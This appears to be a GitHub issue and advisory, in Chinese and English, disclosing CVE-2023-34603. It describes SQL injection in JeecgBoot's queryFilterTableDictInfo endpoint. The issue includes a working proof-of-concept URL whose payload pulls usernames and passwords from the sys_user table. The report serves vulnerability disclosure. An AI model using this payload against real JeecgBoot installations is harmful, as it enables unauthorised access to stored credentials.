Headline
CVE-2023-34603: org.jeecg.modules.api.controller.SystemApiController.queryFilterTableDictInfo方法导致SQL注入 · Issue #4984 · jeecgboot/jeecg-boot
JeecgBoot up to v 3.5.1 was discovered to contain a SQL injection vulnerability via the component queryFilterTableDictInfo at org.jeecg.modules.api.controller.SystemApiController.
版本号:
3.5.1以及之前的所有版本
前端版本:vue3版?还是 vue2版?
vue3版
问题描述:
与问题#4983 类似,访问org.jeecg.modules.api.controller.SystemApiController类中的queryFilterTableDictInfo方法会触发SQL注入,根据需求获取数据库中的关键信息。主要原因还是绕过SQL注入检测方法后,Mybatis中的${XXX}存在SQL注入隐患。
Similar to the issue #4983, accessing the queryFilterTableDictInfo method in the org.jeecg.modules.api.controller.SystemApiController class will trigger SQL injection, allowing retrieval of critical information from the database based on the requirements. The main reason for this is the SQL injection vulnerability associated with ${XXX} in MyBatis, even after bypassing the SQL injection detection methods.
截图&代码:
source code:
SQL Injection
URL: http://localhost:8080/jeecg-boot/sys/api/queryFilterTableDictInfo?table=sys_user&text=password as "text", username as “value” from sys_user --&code=username&filterSql=
友情提示(为了提高issue处理效率):
- 未按格式要求发帖,会被直接删掉;
- 描述过于简单或模糊,导致无法处理的,会被直接删掉;
- 请自己初判问题描述是否清楚,是否方便我们调查处理;
- 针对问题请说明是Online在线功能(需说明用的主题模板),还是生成的代码功能;
Related news
JeecgBoot up to v 3.5.1 was discovered to contain a SQL injection vulnerability via the component `queryFilterTableDictInfo` in method `org.jeecg.modules.api.controller.SystemApiController`.